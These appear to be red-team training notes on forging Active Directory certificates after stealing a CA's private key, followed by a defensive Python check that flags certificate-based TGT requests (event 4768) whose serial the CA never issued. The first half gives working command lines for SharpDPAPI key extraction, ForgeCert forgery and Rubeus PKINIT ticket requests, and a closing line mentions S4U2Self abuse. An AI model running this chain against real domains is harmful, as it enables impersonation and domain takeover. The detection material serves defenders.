In many environments the AD CS roles are not installed on the DCs, and Domain Admin rights are not required to manage them. If a CA's machine account (and with it the CA's DPAPI-protected private key) is compromised, certificates can be forged for any principal, giving both persistence and a path to Domain Admin.

Use SharpDPAPI to enumerate and extract the CA's certificates and private keys from the machine's DPAPI store:

beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine

Save the exported certificate and private key as a .pem file and use openssl to convert it to a .pfx.

Create a forged certificate for the target user with ForgeCert:

C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\sub-ca.pfx --CaCertPassword [ca-cert-password] --Subject "CN=User" --SubjectAltName "[target-user]@[domain-fqdn]" --NewCertPath .\auth.pfx --NewCertPassword [auth-cert-password]

Request a TGT with the forged certificate (PKINIT) using Rubeus:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[target-user] /domain:[domain-fqdn] /enctype:aes256 /certificate:[cert-base64] /password:[cert-password] /nowrap
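From the defender's side, the one artefact a forged certificate cannot have is an entry in the CA's own issued-certificate database, so a certificate-based TGT request (event 4768 with its certificate fields populated) whose serial number the CA never issued is a strong signal. The check below is an added example, not part of the original notes; the 4768 records and the CA database export are constructed samples, and the export format is assumed to resemble certutil -view output.

```python
import re

# Constructed sample of 4768 (Kerberos TGT requested) events reduced to the
# EventData fields that matter here. Real 4768 events carry these same field
# names; a password-based logon leaves the Cert* fields empty.
SAMPLE_4768_EVENTS = [
    {"TargetUserName": "alice", "CertIssuerName": "sub-ca",
     "CertSerialNumber": "2F0000000A1B2C3D", "CertThumbprint": "aa11bb22"},
    {"TargetUserName": "bob", "CertIssuerName": "",
     "CertSerialNumber": "", "CertThumbprint": ""},
    # Forged cert: issuer matches the real CA, but the CA never issued it.
    {"TargetUserName": "da-admin", "CertIssuerName": "sub-ca",
     "CertSerialNumber": "4D:9E:8F:00:12:34:56:78", "CertThumbprint": "cc33dd44"},
]

# Constructed sample of the CA database export; only the serial-number lines
# are parsed, so the exact column set and order do not matter.
SAMPLE_CA_DB_EXPORT = """
Row 1:
  Serial Number: "2f0000000a1b2c3d"
Row 2:
  Serial Number: "2f0000000a1b2c3e"
"""

SERIAL_RE = re.compile(r'Serial Number:\s*"?([0-9a-fA-F: ]+)', re.M)


def normalize_serial(serial: str) -> str:
    """Canonical form: lowercase hex, separators and leading zeros removed."""
    hexdigits = re.sub(r"[^0-9a-f]", "", serial.lower()).lstrip("0")
    return hexdigits or "0"


def parse_issued_serials(export_text: str) -> set:
    """Set of normalized serials the CA actually issued."""
    return {normalize_serial(m) for m in SERIAL_RE.findall(export_text)}


def find_unissued_cert_logons(events, issued_serials):
    """Return certificate-based TGT requests whose serial the CA never issued."""
    hits = []
    for ev in events:
        serial = ev.get("CertSerialNumber", "")
        if not serial.strip():
            continue  # password/NTLM-style preauth, no certificate involved
        if normalize_serial(serial) not in issued_serials:
            hits.append(ev)
    return hits
```

Feed it the real CA export and the 4768 events from the DCs; any hit whose issuer is one of your own CAs is either a database gap or a forged certificate and needs the CA key treated as compromised.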

NOTE

It is also possible to forge machine certificates and abuse S4U2Self to access any domain-joined machine or service.